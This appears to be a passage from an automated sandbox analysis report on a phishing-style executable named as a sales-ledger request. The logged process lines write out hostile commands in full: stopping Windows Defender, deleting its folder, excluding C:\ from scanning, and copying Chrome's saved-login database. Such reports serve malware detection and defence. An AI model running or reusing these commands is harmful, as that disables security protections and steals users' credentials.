                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Code function: 9_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,9_2_004095FD
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Code function: 9_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource,9_2_0040A33B
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Code function: 9_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,9_2_00401306
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Require your Sales Ledger from 01-April-2020.exe.log
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6220:120:WilError_01
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3468:120:WilError_01
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe File created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe File read: C:\Users\user\Desktop\desktop.ini
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
                  Source: Require your Sales Ledger from 01-April-2020.exe ReversingLabs: Detection: 29%
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe File read: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe
                  Source: unknown Process created: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe 'C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe'
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\sc.exe' /WindowState 0 /CommandLine 'stop WinDefend' /StartDirectory '' /RunAs 8 /Run
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 2644
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' /WindowState 0 /CommandLine 'rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse' /StartDirectory '' /RunAs 8 /Run
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 6332
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'powershell' Add-MpPreference -ExclusionPath C:\
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process created: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe
                  Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
                  Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
                  Source: C:\Windows\SysWOW64\cmmon32.exeFile written: C:\Users\user\AppData\Roaming\28L0N9-0\28Llogri.ini
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: C:\Windows\SysWOW64\cmmon32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                  Source: Require your Sales Ledger from 01-April-2020.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: Require your Sales Ledger from 01-April-2020.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                  Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe, 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000000A.00000000.281364076.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000015.00000000.299126160.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.0.dr
                  Source: Binary string: cmmon32.pdb source: Require your Sales Ledger from 01-April-2020.exe, 00000018.00000002.378446347.0000000001650000.00000040.00000001.sdmp
                  Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000019.00000000.354202659.000000000E1C0000.00000002.00000001.sdmp
                  Source: Binary string: cmmon32.pdbGCTL source: Require your Sales Ledger from 01-April-2020.exe, 00000018.00000002.378446347.0000000001650000.00000040.00000001.sdmp
                  Source: Binary string: wntdll.pdbUGP source: Require your Sales Ledger from 01-April-2020.exe, 00000018.00000002.375057704.00000000012EF000.00000040.00000001.sdmp, cmmon32.exe, 00000020.00000002.481029509.0000000004DBF000.00000040.00000001.sdmp
                  Source: Binary string: wntdll.pdb source: Require your Sales Ledger from 01-April-2020.exe, cmmon32.exe
                  Source: Binary string: C:\Development\Releases\Json\Working\Newtonsoft.Json\Working-Signed\Src\Newtonsoft.Json\obj\Release\Net40\Newtonsoft.Json.pdb source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.324077435.0000000007520000.00000004.00000001.sdmp
                  Source: Binary string: wscui.pdb source: explorer.exe, 00000019.00000000.354202659.000000000E1C0000.00000002.00000001.sdmp

                  Data Obfuscation:

                  .NET source code contains potential unpacker
                  Source: Require your Sales Ledger from 01-April-2020.exe, u0002u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: Require your Sales Ledger from 01-April-2020.exe.0.dr, u0002u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 0.2.Require your Sales Ledger from 01-April-2020.exe.500000.0.unpack, u0002u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 0.0.Require your Sales Ledger from 01-April-2020.exe.500000.0.unpack, u0002u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 24.0.Require your Sales Ledger from 01-April-2020.exe.710000.0.unpack, u0002u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 24.2.Require your Sales Ledger from 01-April-2020.exe.710000.1.unpack, u0002u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Yara detected Costura Assembly Loader
                  Source: Yara matchFile source: Require your Sales Ledger from 01-April-2020.exe, type: SAMPLE
                  Source: Yara matchFile source: 00000000.00000002.314738221.0000000002951000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000020.00000002.478765865.0000000002FE8000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000018.00000002.372679225.0000000000712000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.205785020.0000000000502000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.313035991.0000000000502000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000018.00000000.311765187.0000000000712000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.309575411.00000000072A5000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Require your Sales Ledger from 01-April-2020.exe PID: 6300, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Require your Sales Ledger from 01-April-2020.exe PID: 5792, type: MEMORY
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe, type: DROPPED
                  Source: Yara matchFile source: 0.0.Require your Sales Ledger from 01-April-2020.exe.500000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 24.0.Require your Sales Ledger from 01-April-2020.exe.710000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Require your Sales Ledger from 01-April-2020.exe.500000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 24.2.Require your Sales Ledger from 01-April-2020.exe.710000.1.unpack, type: UNPACKEDPE
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 9_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,9_2_0040289F
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeCode function: 0_2_0057A5EC push es; ret 0_2_0057A71A
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeCode function: 0_2_04E27191 push ecx; ret 0_2_04E271A5
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeCode function: 0_2_04E21B58 push esp; retf 0_2_04E21B59
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 9_2_0040B550 push eax; ret 9_2_0040B564
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 9_2_0040B550 push eax; ret 9_2_0040B58C
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 9_2_0040B50D push ecx; ret 9_2_0040B51D
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 13_2_0040B550 push eax; ret 13_2_0040B564
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 13_2_0040B550 push eax; ret 13_2_0040B58C
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 13_2_0040B50D push ecx; ret 13_2_0040B51D
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0041C023 push eax; ret 24_2_0041C029
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0041D0F2 push eax; ret 24_2_0041D0F8
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0041D0FB push eax; ret 24_2_0041D162
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0041D0A5 push eax; ret 24_2_0041D0F8
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0041D15C push eax; ret 24_2_0041D162
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_00416A81 pushfd ; ret 24_2_00416A8C
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0040B28C pushad ; ret 24_2_0040B28D
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0041CFA2 push edx; iretd 24_2_0041CFAC
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0078A5EC push es; ret 24_2_0078A71A
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0124D0D1 push ecx; ret 24_2_0124D0E4
                  Source: C:\Windows\explorer.exeCode function: 25_2_061CB947 pushfd ; retf 25_2_061CB945
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D1D0D1 push ecx; ret 32_2_04D1D0E4
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_02B1B28C pushad ; ret 32_2_02B1B28D
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_02B2DA2D push cs; iretd 32_2_02B2DA2E
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_02B2D0A5 push eax; ret 32_2_02B2D0F8
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_02B2D0F2 push eax; ret 32_2_02B2D0F8
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_02B2D0FB push eax; ret 32_2_02B2D162
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_02B2C023 push eax; ret 32_2_02B2C029
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_02B2D9C9 push ecx; retf 32_2_02B2D9CA
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_02B2D15C push eax; ret 32_2_02B2D162
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_02B2CFA2 push edx; iretd 32_2_02B2CFAC
                  Source: initial sampleStatic PE information: section name: .text entropy: 7.9825675946
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeFile created: \require your sales ledger from 01-april-2020.exe
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeFile created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeFile created: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 9_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,9_2_00401306

                  Hooking and other Techniques for Hiding and Protection:

                  Modifies the prolog of user mode functions (user mode inline hooks)
                  Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8C 0xCE 0xEE
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 9_2_00408E31 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,9_2_00408E31
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmmon32.exe, Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\cmd.exe, Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                  Malware Analysis System Evasion:

                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.314738221.0000000002951000.00000004.00000001.sdmp, Binary or memory string: SBIEDLL.DLLDSELECT * FROM WIN32_COMPUTERSYSTEM
                  Tries to detect virtualization through RDTSC time measurements
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe, RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe, RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                  Source: C:\Windows\SysWOW64\cmmon32.exe, RDTSC instruction interceptor: First address: 0000000002B198E4 second address: 0000000002B198EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                  Source: C:\Windows\SysWOW64\cmmon32.exe, RDTSC instruction interceptor: First address: 0000000002B19B5E second address: 0000000002B19B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe, File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe, Code function: 24_2_00409A90 rdtsc 24_2_00409A90
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe, Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Window / User API: threadDelayed 4734
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Window / User API: threadDelayed 2204
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe TID: 5512, Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6320, Thread sleep count: 4734 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6320, Thread sleep count: 2204 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2596, Thread sleep count: 51 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6920, Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\conhost.exe, Last function: Thread delayed
                  Source: C:\Windows\explorer.exe, Last function: Thread delayed
                  Source: C:\Windows\SysWOW64\cmmon32.exe, Last function: Thread delayed
                  Source: powershell.exe, 00000016.00000003.399487030.000000000599A000.00000004.00000001.sdmp, Binary or memory string: Hyper-V
                  Source: explorer.exe, 00000019.00000000.348253683.000000000871F000.00000004.00000001.sdmp, Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
                  Source: explorer.exe, 00000019.00000000.348253683.000000000871F000.00000004.00000001.sdmp, Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
                  Source: explorer.exe, 00000019.00000000.346788619.0000000008220000.00000002.00000001.sdmp, Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                  Source: explorer.exe, 00000019.00000000.347525561.0000000008640000.00000004.00000001.sdmp, Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.314738221.0000000002951000.00000004.00000001.sdmp, Binary or memory string: vmware
                  Source: explorer.exe, 00000019.00000000.335019320.00000000055D0000.00000004.00000001.sdmp, Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
                  Source: explorer.exe, 00000019.00000000.348253683.000000000871F000.00000004.00000001.sdmp, Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
                  Source: explorer.exe, 00000019.00000000.348253683.000000000871F000.00000004.00000001.sdmp, Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
                  Source: explorer.exe, 00000019.00000000.348546302.00000000087D1000.00000004.00000001.sdmp, Binary or memory string: VMware SATA CD00ices
                  Source: explorer.exe, 00000019.00000000.335150903.0000000005603000.00000004.00000001.sdmp, Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
                  Source: explorer.exe, 00000019.00000000.349143933.00000000088C3000.00000004.00000001.sdmp, Binary or memory string: en_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: explorer.exe, 00000019.00000000.346788619.0000000008220000.00000002.00000001.sdmp, Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                  Source: explorer.exe, 00000019.00000000.346788619.0000000008220000.00000002.00000001.sdmp, Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                  Source: AdvancedRun.exe, 00000009.00000002.283016558.0000000000757000.00000004.00000020.sdmp, Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: powershell.exe, 00000016.00000003.399487030.000000000599A000.00000004.00000001.sdmp, Binary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
                  Source: explorer.exe, 00000019.00000000.346788619.0000000008220000.00000002.00000001.sdmp, Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe, Process information queried: ProcessInformation
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe, Process queried: DebugPort
                  Source: C:\Windows\SysWOW64\cmmon32.exe, Process queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe, Code function: 24_2_0040ACD0 LdrLoadDll, 24_2_0040ACD0
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe, Code function: 9_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 9_2_0040289F
